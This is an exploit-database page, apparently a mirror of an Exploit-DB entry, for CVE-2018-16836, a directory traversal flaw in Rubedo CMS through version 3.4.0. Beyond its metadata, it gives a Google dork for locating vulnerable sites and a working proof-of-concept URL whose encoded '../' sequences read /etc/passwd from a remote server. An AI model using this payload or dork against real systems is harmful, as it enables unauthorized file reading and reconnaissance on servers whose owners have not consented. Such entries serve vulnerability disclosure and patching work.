[] NeoSense
E X P L O I T S
title author type platform port cve id

Rubedo CMS 3.4.0 - Directory Traversal

Author: Marouene Boubakri
type: webapps
platform: linux
port: 
date_added: 2018-09-12 
date_updated: 2018-09-12 
verified: 0 
codes: CVE-2018-16836 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comrubedo-3.4.0.tar.gz
# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Date: 2018-09-11
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836

# PoC:
# Read /etc/passwd file from remote server

/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.